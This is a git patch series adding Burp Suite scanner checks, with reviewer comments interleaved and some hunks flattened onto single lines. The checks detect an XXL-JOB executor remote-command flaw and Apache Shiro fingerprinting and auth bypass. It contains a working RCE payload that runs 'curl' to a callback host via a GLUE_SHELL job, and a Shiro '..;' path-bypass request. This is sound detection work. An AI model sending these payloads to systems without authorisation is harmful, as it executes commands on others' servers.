From 8184daa85c8c0fce3bd8a28d9dcaddd5e4a6aa68 Mon Sep 17 00:00:00 2001
From: QdghJ
Date: Sat, 7 Oct 2023 16:49:12 +0800
Subject: [PATCH 1/5] add xxl-job rce bcheck
---
other/xxl-job/xxl_job_rce.bcheck | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 other/xxl-job/xxl_job_rce.bcheck
diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck
new file mode 100644
index 0000000..2361b91
--- /dev/null
+++ b/other/xxl-job/xxl_job_rce.bcheck
@@ -0,0 +1,24 @@
+metadata:
+ language: v1-beta
+ name: "xxl job rce"
+ description: "xxl job rce detection"
+ author: "timeshatter"
+
+define:
+ poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}`
+
+given request then
+ send request:
+ method: "POST"
+ replacing path: "/run"
+ headers:
+ "Content-Type": "application/json"
+ body: {poc}
+
+ if any interactions then
+ report issue:
+ severity: high
+ confidence: firm
+ detail: "xxl job rce detection."
+ remediation: "Turn on the authentication component that comes with XXL-JOB."
+ end if
From d883428f3ab085e950e073cc2db9d1e303b44d43 Mon Sep 17 00:00:00 2001
From: QdghJ
Date: Sat, 7 Oct 2023 16:53:16 +0800
Subject: [PATCH 2/5] Optimize shiro detection script
---
other/shiro/shiro_active.bcheck | 15 ++++----
other/shiro/shiro_passive.bcheck | 14 +++----
.../CVE-2020-1957-shiro_auth_bypass.bcheck | 38 ++++++++++---------
3 files changed, 35 insertions(+), 32 deletions(-)
diff --git a/other/shiro/shiro_active.bcheck b/other/shiro/shiro_active.bcheck
index 39798ec..4c777bf 100644
--- a/other/shiro/shiro_active.bcheck
+++ b/other/shiro/shiro_active.bcheck
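Review bot: The check actually executes a command on the target — the `poc` sets `"glueType": "GLUE_SHELL"` with a `curl` to the Collaborator address — but nothing in `metadata`, `detail` or the reported issue tells the tester that code was run on the executor rather than merely probed for. The description should make the intrusive nature explicit, e.g. `description: "xxl-job executor RCE detection (intrusive: submits a GLUE_SHELL job that calls out to Collaborator)"`, and `detail` should say the finding rests on an observed out-of-band interaction so the evidence and the expectation that the target owner reviews the executor's job logs are clear in the report. The remediation is also vague: naming the concrete control XXL-JOB ships (the access token shared between admin and executor) and recommending that the executor port not be reachable from untrusted networks would be more actionable than "turn on the authentication component".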
@@ -1,9 +1,9 @@ metadata: - language: v1-beta - name: "Shiro Cookie Check Active" - description: "Detects Shiro Vulnerability by Manipulating Cookie" - author: "timeshatter" - tags: "Shiro,active" + language: v1-beta + name: "Shiro Cookie Check Active" + description: "Detects Shiro Vulnerability by Manipulating Cookie" + author: "timeshatter" + tags: "Shiro,active" define: shiroExploit = "rememberMe=1" @@ -17,8 +17,9 @@ given request then if "rememberMe=deleteMe" in {check.response} then report issue: - severity: high - confidence: firm + severity: info + confidence: certain detail: {issueDetail} remediation: {issueRemediation} end if + \ No newline at end of file diff --git a/other/shiro/shiro_passive.bcheck b/other/shiro/shiro_passive.bcheck index 8b251d9..37a2ae5 100644 --- a/other/shiro/shiro_passive.bcheck +++ b/other/shiro/shiro_passive.bcheck @@ -1,15 +1,15 @@ metadata: - language: v1-beta - name: "Shiro Cookie Check Passive" - description: "Check for Shiro Vulnerability in Response" - author: "timeshatter" - tags: "Shiro,passive" + language: v1-beta + name: "Shiro Cookie Check Passive" + description: "Check for Shiro Vulnerability in Response" + author: "timeshatter" + tags: "Shiro,passive" given response then if "rememberMe=deleteMe" in {latest.response} then report issue: - severity: high - confidence: firm + severity: info + confidence: certain detail: "Shiro Vulnerability Detected: rememberMe=deleteMe" remediation: "Investigate and fix the Shiro vulnerability immediately." end if diff --git a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck index 7ebc312..f6718f7 100644 --- a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck +++ b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck 
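Review bot: In shiro_active.bcheck the finding is downgraded to `severity: info` / `confidence: certain`, which matches what `rememberMe=deleteMe` actually proves — that Apache Shiro is in use — but the metadata `description` still reads "Detects Shiro Vulnerability by Manipulating Cookie", and shiro_passive.bcheck keeps `detail: "Shiro Vulnerability Detected: rememberMe=deleteMe"` and `remediation: "Investigate and fix the Shiro vulnerability immediately."`, so the wording now contradicts the severity. Suggest fingerprint language in both files, e.g. `description: "Fingerprints Apache Shiro via the rememberMe cookie"` and `detail: "Apache Shiro detected: response sets rememberMe=deleteMe"`, with a remediation that asks the owner to confirm the Shiro version and rememberMe configuration rather than to fix an unnamed vulnerability. The `{issueDetail}` and `{issueRemediation}` definitions used by shiro_active are outside this hunk and presumably carry the same "vulnerability" wording. The second shiro_active hunk also adds a whitespace-only `+ ` line with no newline at end of file, which is noise and should be dropped.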
@@ -1,24 +1,26 @@ metadata: - language: v1-beta - name: "CVE-2020-1957 Shiro AuthBypass" - description: "AuthBypass CVE-2020-1957" - author: "timeshatter" - tags: "Shiro", "AuthBypass CVE-2020-1957", "active" + language: v1-beta + name: "CVE-2020-1957 Shiro AuthBypass" + description: "AuthBypass CVE-2020-1957" + author: "timeshatter" + tags: "Shiro", "AuthBypass CVE-2020-1957", "active" given request then - send request called check: - replacing headers: - "Cookie": "rememberMe=1" + if not ({base.response.status_code} is "200") then + send request called check: + replacing headers: + "Cookie": "rememberMe=1" - if "rememberMe=deleteMe" in {check.response} then - send request called auth_pass_check: - replacing path: `/xxx/..;{base.request.url.path}` + if "rememberMe=deleteMe" in {check.response} then + send request called auth_pass_check: + replacing path: `/xxx/..;{base.request.url.path}` - if (not ({check.response.status_code} is "200")) and {auth_pass_check.response.status_code} is "200" then - report issue: - severity: high - confidence: certain - detail: "find shiro AuthBypass CVE-2020-1957" - remediation: "update shiro to last." + if {auth_pass_check.response.status_code} is "200" then + report issue: + severity: high + confidence: certain + detail: "find shiro AuthBypass CVE-2020-1957" + remediation: "update shiro to last." + end if end if - end if + end if \ No newline at end of file From 403493be76e8770717214ce37659ea4f828c1785 Mon Sep 17 00:00:00 2001 From: QdghJ <56074352+QdghJ@users.noreply.github.com> Date: Sat, 7 Oct 2023 17:15:08 +0800 Subject: [PATCH 3/5] Update xxl_job_rce.bcheck --- other/xxl-job/xxl_job_rce.bcheck | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck index 2361b91..167e079 100644 --- a/other/xxl-job/xxl_job_rce.bcheck +++ b/other/xxl-job/xxl_job_rce.bcheck 
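Review bot: The rewritten inner condition reports with `confidence: certain` on `{auth_pass_check.response.status_code} is "200"` alone, and the outer guard only requires the base response to be non-200, so a catch-all route, SPA fallback or custom error page served with 200 for the `/xxx/..;` path would be reported as a certain auth bypass. Either add an equivalence test — for example only report when `{auth_pass_check.response}` differs from `{base.response}` — or lower this path-only heuristic to `confidence: firm`. The guard change also shifts semantics without saying so: the old code required the cookie-manipulated `check` request to be non-200, the new code requires the original `base` request to be non-200; if that is intended (e.g. unauthenticated users are redirected), a sentence in `description` recording the rationale would help the next reader. The file also loses its trailing newline in this hunk.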
@@ -3,6 +3,7 @@ metadata: name: "xxl job rce" description: "xxl job rce detection" author: "timeshatter" + tags: "xxl job" define: poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}` @@ -18,7 +19,7 @@ given request then if any interactions then report issue: severity: high - confidence: firm + confidence: certain detail: "xxl job rce detection." remediation: "Turn on the authentication component that comes with XXL-JOB." end if From 7c36802866a70bd42f29eb76228eba754f3a4719 Mon Sep 17 00:00:00 2001 From: QdghJ <56074352+QdghJ@users.noreply.github.com> Date: Mon, 9 Oct 2023 09:18:51 +0800 Subject: [PATCH 4/5] change to give host change to give host --- other/xxl-job/xxl_job_rce.bcheck | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck index 167e079..ae5491d 100644 --- a/other/xxl-job/xxl_job_rce.bcheck +++ b/other/xxl-job/xxl_job_rce.bcheck @@ -3,12 +3,11 @@ metadata: name: "xxl job rce" description: "xxl job rce detection" author: "timeshatter" - tags: "xxl job" define: poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}` -given request then +given host then send request: method: "POST" replacing path: "/run" From 649f421b0021c06b327fa44ee62187b25079bbc2 Mon Sep 17 00:00:00 2001 
From: QdghJ <56074352+QdghJ@users.noreply.github.com> Date: Mon, 9 Oct 2023 09:25:37 +0800 Subject: [PATCH 5/5] Update xxl_job_rce.bcheck add tags --- other/xxl-job/xxl_job_rce.bcheck | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck index ae5491d..d928b93 100644 --- a/other/xxl-job/xxl_job_rce.bcheck +++ b/other/xxl-job/xxl_job_rce.bcheck @@ -3,6 +3,7 @@ metadata: name: "xxl job rce" description: "xxl job rce detection" author: "timeshatter" + tags: "xxl job" define: poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}` @@ -10,7 +11,7 @@ define: given host then send request: method: "POST" - replacing path: "/run" + path: "/run" headers: "Content-Type": "application/json" body: {poc}
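Review bot: `tags: "xxl job"` does not follow the convention the other checks in this series use — `tags: "Shiro,active"`, `tags: "Shiro,passive"` and `tags: "Shiro", "AuthBypass CVE-2020-1957", "active"` all carry an active/passive marker — and this check both sends requests and executes a job on the target. Suggest `tags: "xxl-job", "active"` (or at least `tags: "xxl job,active"`) so it is grouped with the other active checks when filtering, and so the intrusive nature is visible in the tag list as well as the description.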